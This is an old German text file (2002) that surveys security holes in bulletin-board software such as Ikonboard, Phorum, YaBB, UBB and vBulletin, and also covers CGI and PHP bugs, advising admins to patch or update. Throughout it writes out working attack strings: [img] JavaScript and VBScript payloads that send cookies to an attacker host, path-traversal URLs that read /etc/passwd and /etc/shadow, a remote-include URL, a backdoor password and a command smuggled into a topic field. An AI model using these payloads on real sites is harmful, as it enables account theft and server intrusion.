#::::::::::............... ............::::::::.........::....... ........::::::::::::::::# #::.. Board-Security ........:::::::::................. ........:::::::::::::# #:::::...... by ts0 [ts0@gmx.at] ....................::::....... ............::::# #::::::::::::......... ....................... ::::::..... (c) 2002 ......::# 1.0 Einleitung 1.1 o Auflisting von Board Software 1.2 o zusätzliche Information 2.0 Sicherheitslücken der verschiedenen Boards 2.1 o ezboard bugs 2.2 o ikonboard bugs 2.3 o openbb 2.4 o phorum 2.5 o yabb 2.6 o ubb 2.7 o burning board 2.8 o phpbb 2.9 o vBulletin 3.0 CGI Bugs 3.1 o Info 3.2 o Angriff und Verteidigung 3.3 o Einige CGI-Bugs 3.4 o Weitere Quellen 4.0 PHP Bugs 4.1 o Info 4.2 o Statistiken 4.3 o zu beachten 4.4 o Weitere Quellen und Schlusswort zu PHP 5.0 Ende 5.1 o Greetings 5.2 o Links 5.3 o Schlusswort o 1.0 Einführung in Board-Security! Heutzutage sprießen die Boards gerade so aus dem Boden, was ja auch verständlich ist da Foren eine gute Möglichkeit sind online Diskussionen zu halten die auch später für andere Leute weiterhin verfügbar sind. In Chat's kann man zwar Diskussionen genausogut führen nur muss dazu jeder an der Diskussion teilnehmender anwesend sein, was bei Foren nicht der Fall sein muss, da die eigene Meinung auch erst nach einiger Zeit hinzugefügt werden kann. Natürlich hängt dies immer von der Anzahl der Besucher ab die das Board besuchen. Bei sehr vielen Besuchern wird eine Diskussion ziemlich zügig vorangehen sodass Antworten innerhalb von Minuten keine Seltenheit sind. Es gibt wirklich sehr viel Board-Software, natürlich sind nicht alle von diesen gut. Hier habt ihr eine Auflistung von ein paar Verschiedenen. o 1.1 - board-name url gratis/kostenpflichtig --------------------------------------------------------------------------------------------------------------- - ezboard http://www.ezboard.com gratis - Ikonboard http://www.ikonboard.com - Perl - gratis - OpenBB http://www.iansoft.net - PHP - gratis - Phorum http://www.phorum.org - PHP - gratis - YaBB http://www.yabbforum.com - Perl - gratis - Ultimate Bulletin Board (UBB) http://www.infopop.com- Perl - kostenpflichtig - Burning Board http://www.woltlab.de - PHP - gratis - phpBB http://www.phpbb.com - PHP - gratis - vBulletin http://www.vbulletin.com - PHP - kostenpflichtig > www.vbulletin-germany.com {deutscher Support} > www.vbulletin.org {massenweiße Hacks} > www.sforums.com/ {Portal fürs vbb} > www.vbulletinsites.com {Linkliste sämtlicher vbbs} o 1.2 Für die Administratoren spielt es bei der Wahl der Foren-Software natürlich eine gravierende Rolle wie sicher ihre Kommunikationsplattform ist. Da wie schon oben erwähnt immer mehr Boards entstehen ist dieser Bereich natürlich auch ein anziehender Punkt für so manche Hacker welche durch verschiedene Bugs nicht nur alle Rechte auf dem Board sondern sogar alle Rechte auf dem gesamten Server erhalten können. Darum ist es unerlässlich immer die neueste Version der ausgewählten Board-Software zu installieren um Hackern möglichst wenig Spielraum zu geben. Es sei hier noch anzumerken dass meiner Meinung nach das phpBB- und vBulletin-Boards am meisten verbreitet sind. o 2.0 Nun werde ich ab hier auf alle oben genannten Boards eingehen, natürlich mit einem besonderen Blick auf die Sicherheit. o 2.1 o EZBOARD Die aktuelle Version von ezboard ist 6.8. Ezboard ist gratis und wird von 3 Millionen Menschen genutzt. Diese Board-Software wirbt unter anderem damit dass sie innerhalb von wenigen Minuten zu konfigurieren sei und dass außerdem keine Design- oder Technik-Wissen vorhanden sein muss. Das Board wird auf dem Server von ezboard gehostet und so gibt es laut ezboard keine Bandbreiten-Schwierigkeiten. Es wird allerdings kaum jedermanns Sache sein dass ein Board nicht auf dem eigenen Server gehostet werden kann. Dies bedeutet natürlich auch einen Minus-punkt für die Anonymität der Benutzer und der Betreiber des Forums. Jedoch liegt ezboard die Privatsphäre der Nutzer am Herzen und so folgen sie einer Privacy Police. mehr über die Privacy Police unter: http://www.ezboard.com/about_privacy.html Nun kommen wir wie schon oben erwähnt zu dem wichtigsten Auswahlkriterium für Board-Software. Der Sicherheit! Ich werde hier natürlich nicht alle Bugs aufzählen sondern mich auch ein paar wenige beschränken. o img-bug Dieser wirklich sehr gravierende Bug besteht in + Bulletin Board 6.04e + ezboard 6.2 + WWW Threads PHP 5.4 + vBulletin 2.0.0 RC 2 Wenn man den Board-Usern erlaubt Images in ihren Posts zu verwenden so macht man damit das ganze Forum unsicher. Wenn noch die Aktivierung von Cookies hinzukommt ist es noch um einiges schlimmer. Wenn ein User ein "Image" in seinen Post miteinfügen will so gibt er die Quelle des Images an und es wird ein HTTP GET zu der jeweiligen Url gemacht. Auch wenn diese Url zu keinem Bild führt wird sie trotzdem angesprochen, es wird jedoch kein Bild angezeigt sondern ein Fehler. So kann ein User ein CGI-Script in das Forum einschleusen. Jeder der ab nun diesen Thread betrachten wird ohne zu Wissen ein Opfer des CGI-Scripts welches verschiedene Sachen machen kann. Wenn man nun eine Version benützt welche diese Sicherheitslücke enthält sollte man das einfügen von Bildern in Posts verbieten oder am besten auf eine neue Version der Board-Software updaten da in den neueren Versionen auch andere eventuell existierende Bugs behoben worden sind. o making boards unreachable Dieser Bug der auch sehr schwere Auswirkungen mit sich bringt besteht in folgenden Versionen + Ezboard Ver. 5.3.9. Wenn man versucht ein User-Profil aufzurufen und statt dem Usernamen ein * einsetzt bsp.: http://pub7.ezboard.com/u*.showPublicProfile so wird pub7.ezboard.com unerreichbar oder pub7 laggt. Man könnte diesen Bug sehr leicht exploiten wenn man zb lynx in kombination mit einer schleife benützt. Man sollte auf die neueste Version updaten um diesen Bug zu vermeiden. Da Version 5.3.9 sowieso schon ziemlich alt ist ist dies sicherlich der beste Rat. Das ezboard wäre hiermit abgeschlossen. Ich habe keine weiteren bug-meldungen gefunden, eventuell existieren noch welche, da dass ezboard aber mit Sicherheit nicht zu den wichtigsten unter seinesgleichen gehört denke ich dass dies genug sein sollte! o 2.2 o IKONBOARD Nun kommen wir zum Ikonboard. Das Ikonboard ist wie die meisten in unserer oben angeführten Liste gratis. Das Design des Ikonboards ist wesentlich besser als jenes vom Ezboard. Das Ikonboard liegt derzeit in der Version 3.0.2a. Diese Version soll laut Ikonboard-Homepage einige Bugs entfernt haben. Wo wir auch schon wieder bei unserem Hauptthema wären, der Sicherheit! o html-on vulnerability Der Bug welches die Sicherheit des Forums um einiges senkt ist wirksam unter den folgenden Versionen + Ikonboard 2.1.9 [eventuell auch 2.x.x] Falls html aktiviert ist bringt es Risiken mit sich. Jeder registrierte Member kann ein Script in einem Post miteinbringen welches demjenigen erlaubt das Passwort und den Benutzernamen aller die den Post lesen zu stehlen. Der Angreifer braucht um an die Passwörter und die Benutzernamen der User zu kommen 2 Scripts. Zuerst muss der Angreifer eine php-Datei auf seinem Server deponieren die bei Ausführung in nachstehender Form den Benutzernamen und das Passwort in eine Datei auf dem jeweiligen Server ablegt. getpwd.php?user=BENUTZER&pass=PASSWORT Die php-Datei allein wird natürlich nichts ausrichten können wenn nicht noch ein Script in einem Post auf dem zutreffendem Board gepostet wird. Um den finalen Schritt seiner Attacke zu machen benötigt der Hacker noch ein wenig Können mit Javascript. Dieses Script wird dann im Body des Posts geschrieben. Das Script muss das cookie auslesen und den Benutzernamen in die Variable x und das Passwort in die Variable y exportieren. Nun müsste die php-Datei auf dem Server des Angreifers nur noch mit diesen beiden Variablen ausgeführt werden und die User-Daten würden auf dem Server gespeichert. Das Javascript müsste dazu http://www.server-des-angreifers.com/getpwd.php?user=X&pass=Y in einem Popup-Fenster öffnen. Damit das Popup-Fenster unauffälliger wird könnte der Angreifer das Popup wie ein Werbefenster aussehen lassen. Der Benutzer würde so das Fenster wohl nichtsahnend wieder schließen ohne einen Gedanken daran zu verschwenden. o img-bug Dieser wiedermal gravierende Bug kann unter den Versionen + ikonboard 3.0.1 + ikonboard 3.0.2 + ikonboard 3.0.3 (wird auf deren hp benutzt) ausgenützt werden. Der IMG-Bug wurde schon im ezboard-Bereich besprochen. In bestimmten ezboard-Versionen konnte man Scripts statt einem Bild ausführen und so zum Beispiel Passwörter stehlen,... Dieser Bug ist in den neuen Versionen des Ikonboards nur bedingt vorhanden. Bei schreiben eines Posts ist man laut meinen Informationen nun nicht mehr in der Lage ein Script zu öffnen. Stattdessen muss der Angreifer zuerst einen Post verfassen und diesen dann online stellen und dann den betreffenden Post editieren und den [IMG]-Bereich zu verändern. Wenn nun zum Beispiel der Image-Bereich so verändert wird [IMG]javascript:alert(document.cookie)[/IMG] dann würde eine Message-Box auf dem Bildschirm erscheinen welche die Cookies ausgibt. Um diesen Bug zu beheben sollte man bei editieren eines Textes eine Kontrollfunktion verwenden welche überprüft ob ein http:// vorhanden ist oder nicht. Natürlich würde dies trotzdem nicht vor einem Script eines anderen Servers schützen auf welche eine eventuell vorhandene url in den img-tags zeigen würde. o show-files bug Mit diesem Bug ist es möglich alle Files auf dem Server mit den Rechten des Webservers zu lesen. Er besteht unter folgenden Versionen + Ikonboard 2.1.7b Dieser Bug besteht in der help.cgi. Im Filter wurde der Backslash vergessen wodurch ein Angriff erfolgen kann. Dieser Bug kann die Sicherheit des Servers auf ein Minimum reduzieren wenn der Angreifer die notwendigen Skills hat um diesen Bug 100&ig auszunutzen. Hier sind 2 Beispiele die es verständlicher machen. http://www.board.com/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/passwd%00 Wenn der Webserver die Rechte besitzt die passwd zu lesen dann wird der Angreifer mit Hilfe dieses Befehls an den Inhalt kommen. http://www.board.com/cgi-bin/ikonboard/help.cgi?helpon=../members/.cgi%00 Falls diese Zeile ausgeführt wird würde der Angreifer das Passwort des sehen und außerdem mit dem Member-Namen ersetzen! Diese Methode funktioniert auch mit Administrator-Accounts! Um das Board gegen diese Attacke abzusichern sollte man am besten die neueste Version installieren oder $inhelpon =~ s/\///g; diese Zeile in help.cgi in der 45. Zeile hinzufügen. Das waren nun die wichtigsten Bugs vom Ikonboard. Der img-Bug ist der gravierenste da er sogar bei der aktuellen Version auftritt! o 2.3 o OPENBB OpenBB-Boards sind nicht die meist Vertretenen aber dennoch nicht unbekannt. Es gehört zu den Gratis-Foren-Systemen. Nun kommen wir zu der Sicherheit des Open Bulletin Boards. o img-Bug Wie zu sehen hat bis jetzt noch jedes Board Probleme mit dem einfügen von Bildern in den Posts. Dieser Bug tritt bei folgenden Versionen auf + x.x.x [nein ist kein schreibfehler, dieser bug tritt bei allen versionen auf] Mit Hilfe dieser Zeile [img]javasCript:alert('Hello world.')[/img] kann man eine unter Programmieren altbekannte Message auf dem Bildschirm erscheinen lassen. Natürlich kann der Angreifer durch diesen Bug auch Scripts von anderen Servern ausführen welche eine bestimmte von ihm gewollte Aktion auslösen. Dies ist auch schon der einzige Bug des Open Bulletin Boards, obwohl er durch seine Ernsthaftigkeit auch genügt. Da viele Boards unter dem img-Bug leiden sollte man generell das posten von Bildern nicht erlauben. o 2.4 o PHORUM Dies ist ein weiteres Foren-System welches gratis ist. Die aktuelle Version ist 3.3.2b3. Vor kurzem wurde phorum.org durch einen Bug in deren Foren gehackt, was nicht unbedingt für dieses Forum spricht. Aber nun wird die Sicherheit dieses Boards näher unter die Lupe genommen! o remote command execution Dieser Bug besteht bis zur Version + Phorum 3.3.2a. In der aktuellen 3.3.2b3 wurde dieser Bug behoben. Dieser Bug erlaubt einen Angreifer ein Script eines anderen Servers über eine Befehlszeile auszuführen. So kann dieser Bug in der gleichen Kategorie mit dem img-Bug eingestuft werden. Der Fehler liegt in der del.php. Mit dieser Zeile kann jemand ein Script ausführen http://[forumhost]/phorum/admin/actions/del.php?include_path=http://[angreiferhost]&cmd=ls Diese Zeile würde bewirken dass http://[evilhost]/delete_message.php ausgeführt werden würde. Die del.php öffnet nur die delete_message.php. Eine url auf eine andere Datei würde keine Auswirkungen haben. Der Angreifer muss nur eine delete_message.php auf seinem Server hosten und sie nach seinen Wünschen anpassen, je nachdem was er machen möchte. Man sieht dies ist ein sehr gravierender Bug welchen man falls man Phorum benützt unbedingt entfernen sollte. Am einfachsten geht dies wenn man auf die aktuelle Version 3.3.2b3 updated in der dieser Bug nicht mehr existiert! o reply email address script injection Ein weiterer Bug der auch in der Version + Phorum Phorum 3.3.2a besteht. Wenn ein potentieller Angreifer statt der Reply-Email ein Script einfügt so werden verschiedene Sachen, je nachdem was das Script macht ausgeführt. Dies passiert allerdings erst wenn ein Benutzer des Boards einen Post des Angreifers aufruft. Um diesen Bug auszunutzen müsste der Hacker statt einer reply-Email diese Zeile eingeben. Wobei SCRIPT durch das jeweilige Script ersetzt werden müsste. Wiedereinmal sollte man sich die aktuelle Version der Board-Software von www.phorum.org laden um potentiellen Angreifern kein Schlupfloch offen zu halten. Man sieht bei diesem Bug die Ähnlichkeit mit dem schon bekannten img-Bug welcher fast identisch ist und auch genauso ausgeführt werden muss. o auth.php3 backdoor Dieser Bug erlaubt Leuten die ihn effizient einsetzen Zugang zu Dateien auf dem Server. Er kann unter folgenden Versionen ausgenützt werden + Phorum 3.0.7 [und davor] Das Problem liegt diesmal in der auth.php3/admin.php3. Mit dem Passwort "boogieman" erhält der Angreifer Zugriff auf Dateien die von der auth.php3 verwaltet oder kontrolliert werden. Dieser Bug kann folgendermaßen ausgenützt werden. http://www.ziel.com/admin.php3?PHP_AUTH_USER=boogieman So würde man Zugriff auf die jeweiligen Dateien erhalten. Um diesen Bug zu beseitigen sollte man mit folgendem Link upgraden http://phorum.sourceforge.net/downloads/phorum-3.2.11.tar.gz oder am besten gleich die neueste Version besorgen. o unverified administrative password change Dieser wirklich sehr ernstzunehmende Bug besteht in den Versionen + Phorum 3.0.7 [und davor] Diesmal liegt der Bug in der Datei admin.php3. Wenn dieser Bug effektiv von einem Angreifer ausgenutzt wird kann er das ganze Forum übernehmen. Mit folgender Zeile kann der Angreifer das Passwort zu pwd ändern! http://www.example.com/admin.php3?step=4&option=pass&confirm=flow&newPssword=pwd Nun hat der Hacker alle Rechte auf dem Board. Falls ihm das aber nicht genug sein wird dann kann er mit hilfe eines kleinen Tricks die datei passwd anschaubar machen! Er müsste im Master Settings Menu die .langfile auf ../../../../../../../../../../../etc/passwd setzen und schon /etc/passwd für den Angreifer einsehbar. Um diesen Bug zu entfernen muss man entweder auf http://phorum.sourceforge.net/downloads/phorum-3.2.11.tar.gz updaten oder am besten wie immer die neueste Version runterladen. Das waren die bekanntesten Phorum-Bugs. Gehen wir zum nächsten Board! o 2.5 o YABB Yet Another Bulletin Board ist auch ziemlich bekannt obwohl es eindeutig nicht zu den meist vertretenen zählt. YaBB 1 Gold ist die aktuelle Version dieser Board-Software. Nun sind wir auch schon wieder bei den Sicherheitslücken dieses Boards angelangt. o cross-agent scripting Und schon wieder ein Board mit einem Img-Bug. Wieder fast identisch mit den anderen oben angeführten, weswegen ich auch nicht sehr detalliert auf das Problem eingehen werde. Dieser Bug existiert unter folgenden Version des YaBB + YaBB YaBB 1 Gold Release + YaBB YaBB 1 Gold - SP 1 + YaBB YaBB 9.1x.2000 [img]javascript:document.write ('<img src=http://ANGREIFER-HOMEPAGE/tools/cookie.plx?cookie='+escape(docu ment.cookie)+'>') [/img] Dies würde bewirken dass das Passwort des Users der den Post aufruft an den Server des Angreifers gesendet wird! Bei dem großen Effekt dieses Img-Bugs ist es wirklich verwunderlich dass noch soviele Boards damit ihre Probleme haben. o search.pl bug Dieser auch ernstzunehmende Bug gibt einem potentiellen Angreifer die Möglichkeit Dateien auf dem Server zu suchen oder auszuführen mit den Rechten des Boards. Der Fehler liegt hierbei in der search.pl welche /../ erlaubt anstatt sich abzulehnen. Mit Benutzung der search.pl und zum Beispiel folgender Linie kann ein catsearch ausgeführt werden. ./../../../../../usr/bin/touch%20/tmp/foo| o yabb.pl bug Wieder ein Bug in einer Perl-Datei des YaBB-Boards. Diesmal kann ein User mit Hilfer der yabb.pl jede Datei auf die der Webserver Zugriff hat einsehen. Mit Hilfe dieser Zeile kann ein Hacker die passwd einsehen! http://www.my_target.com/cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../etc/passwd%00 Es sind keine weiteren gravierenden Bugs für das YaBB bekannt. Obwohl diese beiden auch ernsthaft genug sind! o 2.6 o UBB UBB ist ein weiteres Board. Es gibt es in verschiedenen Ausführungen, gratis oder kostenpflichtig. Mehr Info erhaltet ihr auf www.infopop.com. Nun zum Auswahlkriterium Nummer 1. Die Sicherheit. o img-bug Wieder mal ein Img-Bug. UBB jedoch Gegenmassnahmen für das Ausnutzen dieses Bugs gesetzt welche aber mit ein wenig KnowHow von jedem Angreifer übergangen werden können. Die betroffene Version des UBB ist + Ultimate Bulletin Board 6.2.0 Beta Release 1.0 [eventuell auch andere Versionen] UBB hat wie schon erwähnt Gegenmassnahmen gesetzt um das Ausnutzen des Img-Bugs zu unterbinden. So wird im Img-Bereich nach wörtern wie javascript gesucht, was aber zum Ärger der Board-Admins leicht übergangen werden kann indem man anstatt javascript: javascript: verwendet! Damit ein Angreifer diesen Bug ausnützen kann muss er nur folgendes verwenden [IMG]javascript:document.write ('') [/IMG] Damit würden die Passwörter der Benutzer welche den Post betrachten in der Datei cookies.txt auf dem jeweiligen Server gespeichert werden. Natürlich muss der Server (in diesem Beispiel www.angreifer.com) in der Lage sein die Info die zu ihm gesendet auch zu verwenden und Sie in einer Datei speichern zu können! Um ein Board vor diesen Bug zu schützen sollte man das Board so konfigurieren dass http:// am Anfang im Img-Bereich vorhanden sein muss. o spy-bug Bei Ausnutzung dieses Bugs ist es möglich Threads und Foren einzusehen welche normalerweise für non-Admins verboten wären. Dieser Bug ist ausführbar unter den Versionen + Ultimate Bulletin Board Version 5.47a + Ultimate Bulletin Board Version 5.47e (nur bedingt) Die Version 5.47a des UBB macht es möglich dass jeder registrierte Benutzer des Boards gesicherte Bereiche des Boards einsehen kann. Bei 5.47e ist das zwar für normale Benutzer nicht mehr möglich, allerdings können Moderatoren diesen Bug weiterhin ausnutzen! Damit ein Hacker diesen Bug ausnützen kann muss er die Privat-Forum-Nummer, die Nummer des Topic's und des ReplyTo's wissen! Das ganze könnte dann so ausgenützt werden. http://boardhost.org/boarddir/postings.cgi? action=reply&forum=&number=1&topic=000001.cgi& TopicSubject=&replyto=0 Hier nochmal dasselbe nur vielleicht ein wenig verständlicher 'action=reply&forum=EGAL&number=1&topic=000001.cgi&TopicSubject=EGAL&replyto=0' o topic-bug Dieser Bug macht es möglich Befehle auf dem Server auszuführen! Da diese Sicherheitslücke schon relativ alt ist (jahr 2000) darf man damit rechnen dass der Bug kaum noch ausgenützt werden kann. Wenn der Angreifer einen neuen Post anfertigt und im Topic-Bereich eine Zeile wie 012345.ubb|mail hacker@evil.com Dies ist wirklich ein sehr großes Sicherheits-Fehler und sollte durch aktualisieren auf die aktuellste Version behoben werden. o img/vbs-bug Wiedermal ein Img-Bug der aber in Kombination mit vbs auftritt. Er kann unter folgender Version ausgenützt werden + VBulletin 2.2.2 Ein registrierter Benutzer kann in seinem Post vbs-Code einbringen und so verschiedene Attacken auf andere User ausführen! Hier ein Beispiel welches die Passwörter an (http://www.ignite.barrysworld.net/test.php?c= schicken würde [code][img]vbscript:location.replace( chr(104)+chr(116)+chr(116)+chr(112)+chr(58)+ chr(47)+chr(47)+chr(119)+chr(119)+chr(119)+ chr(46)+chr(105)+chr(103)+chr(110)+chr(105)+ chr(116)+chr(101)+chr(46)+chr(98)+chr(97)+ chr(114)+chr(114)+chr(121)+chr(115)+chr(119)+ chr(111)+chr(114)+chr(108)+chr(100)+chr(46)+ chr(110)+chr(101)+chr(116)+chr(47)+chr(116)+ chr(101)+chr(115)+chr(116)+chr(46)+chr(112)+ chr(104)+chr(112)+chr(63)+chr(99)+chr(61)+ escape(document.cookie) )[/img][/code] Dieser Bug sollte wie alle anderen auch durch ein Update auf die neueste Version behoben werden! o img-bug Diesmal ein reiner img-Bug welcher unter folgenden Versionen auftritt + VBulletin 2.2.0 + VBulletin 2.2.2 Um javascripts im [IMG]-Bereich zu verhindern überprüft VBulletin den Image-Bereich nach javascript. Ersetzt man jedoch das javascript durch javascript so wird das Script ohne weiteres ausgeführt! Hier ein Beispiel [IMG]javascript:alert('bla');[/IMG] Wiedereinmal sollte man auf die aktuelle Version 2.2.5 updaten! o get-encrypted-pwds Dies ist wirklich ein sehr großes Sicherheitsloch welches unter der Version + VBulletin 2.2.0 auftritt. Mit Hilfe einer Zeile in dem Post eines Angreifers kann er die one-way-encyrpted Passwörter der Benutzer erhalten. Hier ein Beispiel Dies würde bewirken dass der Angreifer in seinen htppd-logs zb folgendes sehen würde GET /bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fbddf90622;%20sessionhash=a 4719cd620534914930b86839c4bb5f8;%20bbthreadview[5420]=1012444064;%20bblastvi sit=1011983161 Dies sieht zwar im ersten Moment ziemlich nutzlos aus, aber wenn man diese Kombination von Zahlen und Buchstaben direkt verwendet um per url ins Board einzuloggen so funktioniert dass ohne Probleme und man erhält Zugang! Der Admin des Boards sollte entweder auf die aktuelle Version updaten oder das posten von Bildern generell verbieten. So dass ist denke ich mal genug vom VBulletin-Board. Es existieren wie man sieht deutlich mehr Bugs für das VBulletin Board als für das phpBB, obwohl in der aktuellen Version vom VBulletin genauso wie in phpBB bis jetzt keine Bugs bekannt sind. 3.0 Ich werde hier nun einige CGI-Bugs welche auch die Sicherheit von Boards gefährden erläutern. Es ist auch möglich dass einige Bugs die Sicherheit des ganzen Servers gefährden und so auch die Sicherheit des Boards, die ist dann auch der Grund wieso diese genannt werden! o 3.1 o Info Ich werde hier natürlich nicht alle je dagewesenen Bugs aufzählen sondern die aktuellsten und von diesen auch nur einige erläutern. Die meisten Angreifer werden jedoch kaum alle Bugs selber per Browser ausprobieren da es sehr viele dieser Art gibt. o 3.2 o Angriff und Verteidigung Ein wirklich sehr guter Online-Scanner ist Virgil von Marc Rueff mit welchem Sysadmins ihr System schnell und effizient auf eventuell vorhandene CGI-Bugs überprüfen. Der Scanner ist unter folgender Url erreichbar: http://scanner.computec.ch/cgi-bin/virgil/virgil.cgi Es sei hier jedoch angemerkt dass es illegal ist eine Website zu scannen von bei deren man nicht die Erlaubnis besitzt den jeweiligen Webserver zu scannen! Wohl kein ein System-Administrator hat daran Interesse von irgendwelchen Newbies andauernd nach CGI-Bugs gescannt zu werden. Um dies zu unterbinden gibt es ein Tool namens "CGI Scanner Trap 1.0" welches CGI-Scans erkennt und dann eine Warnung mit der IP und der Version des benutzten Webbrowsers in den Syslogs ablegt! Dieses wirkliche nützliche Tool ist unter folgender Url auf securityfocus erhaltbar: http://online.securityfocus.com/data/tools/trappa.tar.gz o 3.3 o Einige CGI-Bugs Wie oben schon erwähnt werde ich hier nicht alle CGI-Bugs auflisten! Es sei jedoch hier noch erwähnt dass diese Bugs meistens nicht existent sind und daher auch nicht ausgenützt werden können. PHP: http://www.domain.com/cgi-bin/php.cgi?/etc/passwd http://www.domain.com/cgi-bin/php.cgi?/etc/shadow PHF: http://www.domain.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd http://www.domain.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/shadow HTML: http://www.domain.com/cgi-bin/htmlscript?/etc/passwd http://www.domain.com/cgi-bin/htmlscript?/etc/shadow Ein weiterer Bug: http://www.domain.com//cgi-bin/abfrage.cgi Das // nach domain.com bewirkt dass das Script nicht richtig gefunden wird und falls dieser Bug existiert, der Angreifer dann den Source-Coder der jeweiligen CGI-Datei ansehen kann. o 3.4 o Weitere Quellen Da diese Bugs kaum noch existieren Verweise ich hier nur noch auf http://www.kryptocrew.de/archiv/hacking/cgi/CGI-BUGS/ wo man eine Auflistung vieler CGI-Bugs findet! Womit ich das Thema CGI-Bugs auch schon fertig besprochen hätte, da es wie gesagt kaum noch existierende Sicherheitslücken in dieser Richtung auf Webservern gibt. 4.0 In diesem Kapitel werden nun die PHP-Bugs besprochen. o 4.1 o Info Im Gegensatz zu den CGI-Bugs welche kaum mehr zu finden sind stellen PHP-Bugs eine viel größere Gefahr für das Board und/oder den Server dar da es sehr viele von Ihnen gibt und viele Boards PHP benützen. Auch schon die meisten neueren Websites verwenden PHP und so ergibt sich für einen Angreifer welcher imstande ist diese Häufen von Bugs effizient auszunutzen ein riesiges Angriffsfeld. Es ist daher sehr wichtig dass ein System-Administrator sich immer auf dem laufenden hält über neue Sicherheitslükcen und deren Auswirkungen. o 4.2 o Statistiken Da es sehr viele PHP 3 und PHP 4 Bugs gibt wurden auch schon Statistiken aufgestellt wieviele es genau gibt und wieviele von Ihnen geschlossen wurden, und wieviele nicht. PHP 3: Es existieren sage und schreibe allein für die Version 3 von PHP 2983 Bugs. Von diesen wurden insgesamt schon 2442 geschlossen. Dennoch sind immer noch 511 Bugs nicht geschlossen! Da die Version PHP 3 aber eher selten noch Verwendung findet stellt dies nicht so ein großes Problem dar. PHP 4: Bei der Version 4 von PHP existieren sogar noch mehr Bugs als in der Version 3. Insgesamt sind bis jetzt 14167 Bugs bekannt von denen noch 1320 offen sind! Natürlich stimmen diese Statistiken schon nicht mehr wenn dieser Text gelesen wird da jeden Tag Dutzende von Bugs bekannt werden. o 4.3 o zu beachten Es sei hier jedoch angemerkt dass ein Bug nicht gleich eine Sicherheitslücke ist. Von den Tausenden von bekannten PHP Bugs sind wohl kaum 5 Prozent wirkliche sicherheitsgefährdende Probleme. Zum Beispiel ist die Darstellung eines falschen Icons ein Bug, obwohl man es natürlich nicht als Sicherheitslücke bezeichnen kann, da keine Möglichkeit besteht durch diesen Bug irgendwelche Rechte oder sonstiges auf dem Board oder dem Server zu erhalten. o 4.4 o Weitere Quellen und SChlusswort zu PHP Da es soviele Bugs gibt habe ich mich entschlossen keinen dieser Fehler aufzuzählen und stattdessen gute Links zu diesem Thema hier anzugeben. o php.bugs http://lists.php.net/group.php?group=php.bugs Eine Liste aller PHP Bugs ob nun Version 4 oder Version 3. Dieses Archiv wird täglich auf den neuesten Stand gebracht. Jeden Tag findet man dort Dutzende von neuen Bugs sauber aufgelistet und nach der Aktualität geordnet! o bugs.php.net http://bugs.php.net/ Diese Seite bietet eine Statistik auf der die Anzahl der Bugs und wieviele von Ihnen geschlossen sind angezeigt werden. Außerdem kann man auf dieser Seite nach Bugs suchen Hiermit möchte ich die PHP Sektion schon abschließen. Es gilt natürlich generell dass man immer auf die neueste Version von PHP updaten soll und sich Updates holen. Außerdem sollte man sich immer auf dem laufenden halten was Bugs angeht, damit man nicht das Opfer eines leicht zu verhinderten Angriffs wird. Wie schon gesagt. Bugs sind nicht zwingend Sicherheitslücken, weswegen man sich wegen der großen Anzahl von Bugs nicht erschrecken sollte sondern nur achtsam auf Sicherheitslücken sein obwohl ein Admin sicherlich die anderen Bugs auch beseitigt haben möchte. 5.0 Nun sind wir schon fast am Schluss angelangt. Ich hoffe ich konnte einen mehr oder weniger kleinen Einblick in die Sicherheit von Foren-Systemen geben. o 5.1 o Greetings Ich grüsse hiermit folgende Sites mit Ihren Members o nightfear www.nightfear.org :: serverdienste 4 free o remote-sec www.remote-sec.com :: security-page o kc www.kryptocrew.de :: dürfte bekannt sein o 5.2 o Links Hier werde ich nochmal die wichtigsten oben genannten Links aufführen. o Board-Links - ezboard http://www.ezboard.com - Ikonboard http://www.ikonboard.com - Perl - - OpenBB http://www.iansoft.net - PHP - - Phorum http://www.phorum.org - PHP - - YaBB http://www.yabbforum.com - Perl - - Ultimate Bulletin Board (UBB) http://www.infopop.com- Perl - - Burning Board http://www.woltlab.de - PHP - - phpBB http://www.phpbb.com - PHP - - vBulletin http://www.vbulletin.com - PHP - > www.vbulletin-germany.com {deutscher Support} > www.vbulletin.org {massenweiße Hacks} > www.sforums.com/ {Portal fürs vbb} > www.vbulletinsites.com {Linkliste sämtlicher vbbs} o CGI-Links - http://scanner.computec.ch/cgi-bin/virgil/virgil.cgi [online cgi-scanner] - http://online.securityfocus.com/data/tools/trappa.tar.gz [cgi-scan detector] o PHP-Links - http://lists.php.net/group.php?group=php.bugs Eine Liste aller PHP Bugs ob nun Version 4 oder Version 3. Dieses Archiv wird täglich auf den neuesten Stand gebracht. Jeden Tag findet man dort Dutzende von neuen Bugs sauber aufgelistet und nach der Aktualität geordnet! - http://bugs.php.net/ Diese Seite bietet eine Statistik auf der die Anzahl der Bugs und wieviele von Ihnen geschlossen sind angezeigt werden. o 5.3 o Schlusswort Nun sind wir aber wirklich am Ende. Ob nun auch mit dem Nerven sowieso mit dem Text sei dahingestellt. Ich hoffe ich konnte in diesem Text erläutern wie wichtig Updates, neue Versionen,... von Boards sind um die Sicherheit des Boards, ja sogar die des ganzen Servers auf einem hohen Niveau zu halten. Besonder wenn mehrere User auf Ihrem Server ein Board betreiben sollte man ein noch genaueres Auge auf aktuelle Bugs, Sicherheitslücken haben. -----------------------------------------------------------------------------the end by ts0 [ ts0@gmx.at ]